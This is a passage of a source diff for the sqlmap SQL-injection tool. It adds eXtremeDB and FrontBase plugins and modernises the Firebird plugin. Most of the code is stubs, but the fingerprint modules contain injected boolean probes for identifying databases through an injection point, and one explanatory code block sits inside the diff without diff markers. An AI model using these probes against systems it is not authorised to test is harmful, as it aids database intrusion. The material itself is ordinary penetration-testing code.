SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Apache Derby it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Apache Derby it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Apache Derby it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/extremedb/__init__.py b/plugins/dbms/extremedb/__init__.py new file mode 100644 index 00000000000..74072270325 --- /dev/null +++ b/plugins/dbms/extremedb/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import EXTREMEDB_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.extremedb.enumeration import Enumeration +from plugins.dbms.extremedb.filesystem import Filesystem +from plugins.dbms.extremedb.fingerprint import Fingerprint +from plugins.dbms.extremedb.syntax import Syntax +from plugins.dbms.extremedb.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class ExtremeDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines eXtremeDB methods + """ + + def __init__(self): + self.excludeDbsList = EXTREMEDB_SYSTEM_DBS + + for cls in self.__class__.__bases__: + 
cls.__init__(self) + + unescaper[DBMS.EXTREMEDB] = Syntax.escape diff --git a/plugins/dbms/extremedb/connector.py b/plugins/dbms/extremedb/connector.py new file mode 100644 index 00000000000..3c0083ad8cb --- /dev/null +++ b/plugins/dbms/extremedb/connector.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + def connect(self): + errMsg = "on eXtremeDB it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/extremedb/enumeration.py b/plugins/dbms/extremedb/enumeration.py new file mode 100644 index 00000000000..c820b73e55a --- /dev/null +++ b/plugins/dbms/extremedb/enumeration.py @@ -0,0 +1,84 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getBanner(self): + warnMsg = "on eXtremeDB it is not possible to get the banner" + logger.warning(warnMsg) + + return None + + def getCurrentUser(self): + warnMsg = "on eXtremeDB it is not possible to enumerate the current user" + logger.warning(warnMsg) + + def getCurrentDb(self): + warnMsg = "on eXtremeDB it is not possible to get name of the current database" + logger.warning(warnMsg) + + def isDba(self, user=None): + warnMsg = "on eXtremeDB it is not possible to test if current user is DBA" + logger.warning(warnMsg) + + def getUsers(self): + warnMsg = "on eXtremeDB it is not possible to enumerate the users" + logger.warning(warnMsg) + + return [] + + def getPasswordHashes(self): + warnMsg = "on eXtremeDB it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + + return {} + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on eXtremeDB it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getDbs(self): + warnMsg = "on eXtremeDB it is not possible to enumerate databases (use only '--tables')" + logger.warning(warnMsg) + + return [] + + def searchDb(self): + warnMsg = "on eXtremeDB it is not possible to search databases" + logger.warning(warnMsg) + + return [] + + def searchTable(self): + warnMsg = "on eXtremeDB it is not possible to search tables" + logger.warning(warnMsg) + + return [] + + def searchColumn(self): + warnMsg = "on eXtremeDB it is not possible to search columns" + logger.warning(warnMsg) + + return [] + + def search(self): + warnMsg = "on eXtremeDB search option is not available" + logger.warning(warnMsg) + + def getHostname(self): + warnMsg = "on eXtremeDB it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on eXtremeDB it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/extremedb/filesystem.py b/plugins/dbms/extremedb/filesystem.py new file mode 100644 index 00000000000..09a02ac9ec4 --- /dev/null +++ b/plugins/dbms/extremedb/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying 
permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on eXtremeDB it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on eXtremeDB it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/extremedb/fingerprint.py b/plugins/dbms/extremedb/fingerprint.py new file mode 100644 index 00000000000..99e3737735b --- /dev/null +++ b/plugins/dbms/extremedb/fingerprint.py @@ -0,0 +1,93 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import EXTREMEDB_ALIASES +from lib.core.settings import METADB_SUFFIX +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.EXTREMEDB) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.EXTREMEDB + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(EXTREMEDB_ALIASES): + setDbms(DBMS.EXTREMEDB) + return True + + infoMsg = "testing %s" % DBMS.EXTREMEDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("signature(NULL)=usignature(NULL)") + + if result: + infoMsg = "confirming %s" % DBMS.EXTREMEDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("hashcode(NULL)>=0") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.EXTREMEDB + logger.warning(warnMsg) + + return False + + setDbms(DBMS.EXTREMEDB) + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.EXTREMEDB + logger.warning(warnMsg) + + return False + + def forceDbmsEnum(self): + conf.db = ("%s%s" % (DBMS.EXTREMEDB, METADB_SUFFIX)).replace(' ', '_') diff --git a/plugins/dbms/extremedb/syntax.py b/plugins/dbms/extremedb/syntax.py new file mode 100644 index 00000000000..17a0a02c257 --- /dev/null +++ b/plugins/dbms/extremedb/syntax.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + 
""" + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar" + True + """ + + return expression diff --git a/plugins/dbms/extremedb/takeover.py b/plugins/dbms/extremedb/takeover.py new file mode 100644 index 00000000000..fa0f6395c4f --- /dev/null +++ b/plugins/dbms/extremedb/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on eXtremeDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on eXtremeDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on eXtremeDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on eXtremeDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/firebird/__init__.py b/plugins/dbms/firebird/__init__.py index 82920d103f5..08b0f1e79bf 100644 --- a/plugins/dbms/firebird/__init__.py +++ b/plugins/dbms/firebird/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,11 +23,7 @@ class FirebirdMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, T def __init__(self): self.excludeDbsList = FIREBIRD_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.FIREBIRD] = Syntax.escape diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py index 976f91a3083..ac00ce03173 100644 --- a/plugins/dbms/firebird/connector.py +++ b/plugins/dbms/firebird/connector.py @@ -1,17 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: import kinterbasdb -except ImportError: +except: pass import logging +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -26,9 +27,6 @@ class Connector(GenericConnector): License: BSD """ - def __init__(self): - GenericConnector.__init__(self) - # sample usage: # ./sqlmap.py -d "firebird://sysdba:testpass@/opt/firebird/testdb.fdb" # ./sqlmap.py -d "firebird://sysdba:testpass@127.0.0.1:3050//opt/firebird/testdb.fdb" @@ -39,27 +37,28 @@ def connect(self): self.checkFileDb() try: - self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), \ - user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") # Reference: 
http://www.daniweb.com/forums/thread248499.html - except kinterbasdb.OperationalError, msg: - raise SqlmapConnectionException(msg[1]) + # Reference: http://www.daniweb.com/forums/thread248499.html + self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") + except kinterbasdb.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except kinterbasdb.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + except kinterbasdb.OperationalError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) return None def execute(self, query): try: self.cursor.execute(query) - except kinterbasdb.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except kinterbasdb.Error, msg: - raise SqlmapConnectionException(msg[1]) + except kinterbasdb.OperationalError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except kinterbasdb.Error as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.connector.commit() diff --git a/plugins/dbms/firebird/enumeration.py b/plugins/dbms/firebird/enumeration.py index 16e444b8aee..2e911310b1b 100644 --- a/plugins/dbms/firebird/enumeration.py +++ b/plugins/dbms/firebird/enumeration.py @@ -1,41 +1,38 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.data import logger from plugins.generic.enumeration import Enumeration as GenericEnumeration class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - def getDbs(self): warnMsg = "on Firebird it is not possible to enumerate databases (use only '--tables')" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def getPasswordHashes(self): warnMsg = "on Firebird it is not possible to enumerate the user password hashes" - logger.warn(warnMsg) + logger.warning(warnMsg) return {} def searchDb(self): warnMsg = "on Firebird it is not possible to search databases" - logger.warn(warnMsg) - - return [] - - def searchColumn(self): - warnMsg = "on Firebird it is not possible to search columns" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def getHostname(self): warnMsg = "on Firebird it is not possible to enumerate the hostname" - logger.warn(warnMsg) + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Firebird it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/firebird/filesystem.py b/plugins/dbms/firebird/filesystem.py index 0f8d84a8a42..949e3191976 100644 --- a/plugins/dbms/firebird/filesystem.py +++ b/plugins/dbms/firebird/filesystem.py @@ -1,21 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from 
lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): + def readFile(self, remoteFile): errMsg = "on Firebird it is not possible to read files" raise SqlmapUnsupportedFeatureException(errMsg) - def writeFile(self, wFile, dFile, fileType=None): + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "on Firebird it is not possible to write files" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py index 8d192d3cb3e..db0bbc07a56 100644 --- a/plugins/dbms/firebird/fingerprint.py +++ b/plugins/dbms/firebird/fingerprint.py @@ -1,17 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from lib.core.common import Backend from lib.core.common import Format -from lib.core.common import getUnicode -from lib.core.common import randomInt from lib.core.common import randomRange +from lib.core.common import randomStr +from lib.core.compat import xrange +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -19,7 +20,6 @@ from lib.core.session import setDbms from lib.core.settings import FIREBIRD_ALIASES from lib.core.settings import METADB_SUFFIX -from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.request import inject from plugins.generic.fingerprint import Fingerprint as GenericFingerprint @@ -52,13 +52,14 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] + banVer = kb.bannerFp.get("dbmsVersion") - if re.search("-log$", kb.data.banner): - banVer += ", logging enabled" + if banVer: + if re.search(r"-log$", kb.data.banner or ""): + banVer += ", logging enabled" - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() @@ -70,17 +71,18 @@ def getFingerprint(self): def _sysTablesCheck(self): retVal = None table = ( - ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)), - ("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")), - ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")), - ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")), - # TODO: add test for Firebird 2.5 - ) + ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)), + ("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")), + ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")), + ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")), + ("2.5", ("'%s' SIMILAR TO '%s'",)), # Reference: https://firebirdsql.org/refdocs/langrefupd25-similar-to.html + ("3.0", ("FALSE IS FALSE",)), # https://www.firebirdsql.org/file/community/conference-2014/pdf/02_fb.2014.whatsnew.30.en.pdf + ) for i in xrange(len(table)): version, checks = table[i] failed 
= False - check = checks[randomRange(0, len(checks) - 1)].replace("%d", getUnicode(randomRange(1, 100))) + check = checks[randomRange(0, len(checks) - 1)].replace("%d", getUnicode(randomRange(1, 100))).replace("%s", getUnicode(randomStr())) result = inject.checkBooleanExpression(check) if result: @@ -104,15 +106,7 @@ def _dialectCheck(self): return retVal def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(FIREBIRD_ALIASES) \ - or conf.dbms in FIREBIRD_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - + if not conf.extensiveFp and Backend.isDbmsWithin(FIREBIRD_ALIASES): setDbms("%s %s" % (DBMS.FIREBIRD, Backend.getVersion())) self.getBanner() @@ -122,8 +116,7 @@ def checkDbms(self): infoMsg = "testing %s" % DBMS.FIREBIRD logger.info(infoMsg) - randInt = randomInt() - result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM RDB$DATABASE WHERE %d=%d)>0" % (randInt, randInt)) + result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM RDB$DATABASE WHERE [RANDNUM]=[RANDNUM])>0") if result: infoMsg = "confirming %s" % DBMS.FIREBIRD @@ -133,7 +126,7 @@ def checkDbms(self): if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -153,7 +146,7 @@ def checkDbms(self): return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD - logger.warn(warnMsg) + logger.warning(warnMsg) return False diff --git a/plugins/dbms/firebird/syntax.py b/plugins/dbms/firebird/syntax.py index f3f801a9158..a430debce7f 100644 --- a/plugins/dbms/firebird/syntax.py +++ b/plugins/dbms/firebird/syntax.py @@ -1,21 +1,31 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import isDBMSVersionAtLeast +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> from lib.core.common import Backend + >>> Backend.setVersion('2.0') + ['2.0'] + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar" + True + >>> Backend.setVersion('2.1') + ['2.1'] + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT ASCII_CHAR(97)||ASCII_CHAR(98)||ASCII_CHAR(99)||ASCII_CHAR(100)||ASCII_CHAR(101)||ASCII_CHAR(102)||ASCII_CHAR(103)||ASCII_CHAR(104) FROM foobar" + True + """ + def escaper(value): - return "||".join("ASCII_CHAR(%d)" % ord(_) for _ in value) + return "||".join("ASCII_CHAR(%d)" % _ for _ in getOrds(value)) retVal = expression diff --git a/plugins/dbms/firebird/takeover.py b/plugins/dbms/firebird/takeover.py index 7f34eb12f4c..1fb4432d443 100644 --- a/plugins/dbms/firebird/takeover.py +++ b/plugins/dbms/firebird/takeover.py @@ -1,17 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.takeover import Takeover as GenericTakeover 
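# How the version-probe table above is used: _sysTablesCheck() picks one expression
# template per candidate Firebird version and fills its "%d"/"%s" placeholders with
# random values before passing it to inject.checkBooleanExpression(); the highest
# version whose probe still evaluates truthfully is kept. A minimal standalone sketch
# of that template instantiation, using plain random/string stand-ins for sqlmap's
# randomRange()/randomStr() (illustrative names only, not part of the patch):

import random
import string

PROBES = (
    ("2.1", ("PI()>0.%d", "RAND()<1.%d")),
    ("2.5", ("'%s' SIMILAR TO '%s'",)),
    ("3.0", ("FALSE IS FALSE",)),
)

def instantiate(template):
    # str.replace() substitutes every occurrence, so both "%s" placeholders of the
    # SIMILAR TO probe receive the same random string, just as in the plugin code
    filled = template.replace("%d", str(random.randint(1, 100)))
    return filled.replace("%s", "".join(random.choice(string.ascii_lowercase) for _ in range(8)))

for version, templates in PROBES:
    print(version, instantiate(random.choice(templates)))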
class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - def osCmd(self): errMsg = "on Firebird it is not possible to execute commands" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/frontbase/__init__.py b/plugins/dbms/frontbase/__init__.py new file mode 100644 index 00000000000..5d148c15aaf --- /dev/null +++ b/plugins/dbms/frontbase/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import FRONTBASE_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.frontbase.enumeration import Enumeration +from plugins.dbms.frontbase.filesystem import Filesystem +from plugins.dbms.frontbase.fingerprint import Fingerprint +from plugins.dbms.frontbase.syntax import Syntax +from plugins.dbms.frontbase.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class FrontBaseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines FrontBase methods + """ + + def __init__(self): + self.excludeDbsList = FRONTBASE_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.FRONTBASE] = Syntax.escape diff --git a/plugins/dbms/frontbase/connector.py b/plugins/dbms/frontbase/connector.py new file mode 100644 index 00000000000..2f69bfc8af3 --- /dev/null +++ b/plugins/dbms/frontbase/connector.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + def connect(self): + errMsg = "on FrontBase it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/frontbase/enumeration.py b/plugins/dbms/frontbase/enumeration.py new file mode 100644 index 00000000000..374b4f7930e --- /dev/null +++ b/plugins/dbms/frontbase/enumeration.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getBanner(self): + warnMsg = "on FrontBase it is not possible to get the banner" + logger.warning(warnMsg) + + return None + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on FrontBase it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on FrontBase it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on FrontBase it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/frontbase/filesystem.py b/plugins/dbms/frontbase/filesystem.py new file mode 100644 index 00000000000..7a6654966ee --- /dev/null +++ b/plugins/dbms/frontbase/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import 
SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on FrontBase it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on FrontBase it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/frontbase/fingerprint.py b/plugins/dbms/frontbase/fingerprint.py new file mode 100644 index 00000000000..bb5e15a5c3e --- /dev/null +++ b/plugins/dbms/frontbase/fingerprint.py @@ -0,0 +1,89 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import FRONTBASE_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.FRONTBASE) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.FRONTBASE + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(FRONTBASE_ALIASES): + setDbms(DBMS.FRONTBASE) + return True + + infoMsg = "testing %s" % DBMS.FRONTBASE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("(SELECT degradedTransactions FROM INFORMATION_SCHEMA.IO_STATISTICS)>=0") + + if result: + infoMsg = "confirming %s" % DBMS.FRONTBASE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("(SELECT TOP (0,1) file_version FROM INFORMATION_SCHEMA.FRAGMENTATION)>=0") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.FRONTBASE + logger.warning(warnMsg) + + return False + + setDbms(DBMS.FRONTBASE) + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.FRONTBASE + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/frontbase/syntax.py b/plugins/dbms/frontbase/syntax.py new file mode 100644 index 00000000000..17a0a02c257 --- /dev/null +++ b/plugins/dbms/frontbase/syntax.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar" + True + """ 
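        # unlike the Firebird plugin above (ASCII_CHAR() chains) and the H2/HSQLDB
        # plugins below (CHAR() chains), the FrontBase handler leaves quoted string
        # literals in the payload untouched, so escape() is a plain pass-through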
